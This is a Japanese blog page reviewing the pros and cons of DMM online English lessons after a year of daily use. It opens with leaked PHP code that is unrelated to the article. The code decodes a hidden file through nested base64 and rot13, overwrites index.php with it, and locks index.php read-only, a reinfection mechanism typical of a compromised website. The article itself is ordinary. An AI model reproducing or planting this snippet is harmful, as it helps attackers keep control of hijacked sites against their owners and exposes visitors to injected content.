$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } DMM英会話で分かったオンライン英会話のメリットとデメリット | TAKUTIVITY – タクティビティ

DMM英会話で分かったオンライン英会話のメリットとデメリット

情報
スポンサーリンク

英会話を学ぶにあたってどのように学習を進めればよいか分からない、迷っているという方は多くいると思います。最近ではインターネット環境もかなり充実してきているのでオンライン英会話はその選択支の一つ。 でも、オンライン英会話ってPC越しにレッスンをするのでどんな雰囲気か少し不安ですよね?

実は、始めてしまえばそんなに難しいことはありません。

私はオンライン英会話を

私は1年間、1度も休む事無くDMM英会話を継続してきました。その中で、オンライン英会話におけるいくつかのメリットとデメリットに気づきましたのでこの記事でシェアしていきたいと思います。これからオンライン英会話を始めようとしている方の参考になれば幸いです。

メリット

  • 料金が安い
  • 毎日好きな時間に受講できる
  • 教材が豊富で自分に合った物を選択できる
  • インターネット環境さえあれば場所を選ばない

DMM英会話の場合、スタンダードプランで毎日1レッスン約200円受講できます。一方、カフェ英会話の場合は1回1.5Hで500円ですが相手が日本人。さらに、カフェでやるのでワンドリンク制。結局1回につき1000円程はかかります。しかもレベル別に振り分けられるので初心者の場合は初心者同士になります。レッスンではないので、基本的に分からないことはそのままです。このように書くとカフェ英会話を全否定しているようなのでフォローを入れておくと、1時間1260円のプレミアムカフェ英会話であればネイティブ講師と英会話をしながら学べるようです。カフェ英会話も要は使い方で、中級以上の人が時々自分の英会話レベルを確認するには良いイベントだと思います。

毎日受講するというメリット

DMM英会話では毎日レッスンを受けられるというメリットがあります。1レッスンの時間は25分と短いですが毎日1回受講できます。(2回受講できるプランもあります)この毎日受講できるという点が大きなメリットです。結局1時間ネイティブと喋ったって1週間後には忘れています。であれば、ネイティブじゃなくても毎日少しづつ英語に触れる機会があった方が上述した第一歩には適しています。また、時間の自由度も高いので、どうしても朝受講できない場合は夜受講したりすることもできます。このような仕組みのおかげで1日も休まず継続できているといっても過言ではありません。一番ワイルドだったのは家族でキャンプに行ったときも、早朝の車の中で受講しました。

デメリット

  • 質の悪い講師が存在する
  • 時間帯によっては講師の予約合戦が激しい
  • レッスン後に不明点があっても聞けない

残念ながら数多くいる講師のなかで適当な感じでレッスンをする講師は存在します。そのような講師は生徒から悪い評価をくだされるので大体評価の点数が低いです。なので人気講師は予約が取りづらいということがあります。また、次のレッスンが予約可能になるのは現在のレッスンが開始された直後からなので、人気の時間帯は予約合戦が繰り広げられているようです。例えば、私は6:30にレッスンを受けることが多いのですが、6:30に次の更新予約画面を開いておいて予約ボタンをクリックしても他の生徒さんに先を越されるなんてことはざらにあります。そうした予約に失敗するとあまり評価の高くない講師でレッスンを受けなければならないとうことが起こってしまいます。ただ、多少評価が低くてもフィーリングというのは大事で自分にとって話しやすいような先生であれば全然OKです。逆に評価が高くてもフィーリングが合わず少し話しにくいと感じる先生もいます。駅前留学(←古い)的な英会話レッスンであれば、受講後に先生に質問なんてこともできるんでしょうけど、オンラインレッスンの場合はきっちり25分間で終了という感じなのでレッスン後に先生に質問はできません。先生も次のレッスンがすぐ始まりますしね。どうしても質問がある時はレッスンの中で解決する必要があります。

毎日やっても日数に計算すると・・・?

オンライン英会話はレッスン時間が短いので、毎日やっていても実は日数に計算すると「え?まだそれだけしかやってないの?」という感覚に陥ります。

少し計算してみましょう。

1日25分を1年間毎日やったとします。

25分×365日 = 9125分

この9125分を日数に直していきます。

9125分÷60分(1時間)÷24時間(1日)= 6.336…日間

はい。出ました。約6日間です。1年間休まず継続しても6日間分の英会話体験していないということになります。日数ベースでみると結構少ないですよね?これを良しとするかどうかは受講者自身ではありますが、私は1週間の超短期留学に行くよりも、オンライン英会話を毎日継続した方が学習メリットがあると考えています。私たちはネイティブスピーカーではないので、結局使わなければ忘れてしまいます。毎日少しづつでも英語に触れているほうが繰り返しの学習にもなりますよね。

私の身内にTOEIC900越えの方がいます。彼は国内の大手企業に勤めていますが、一時期はアメリカへ赴任していました。しかし帰国してからは全く英語に触れる機会がなく徐々にそのレベルが落ちていると実感していたそうです。そこで、英語レベルをキープするためにオンライン英会話を選択したそうです。

学習以外にも英語レベルをキープするためにオンライン英会話を使うという選択肢もあるんですね。忙しい社会人こそオンライン英会話はおススメの英会話ですね!

コメント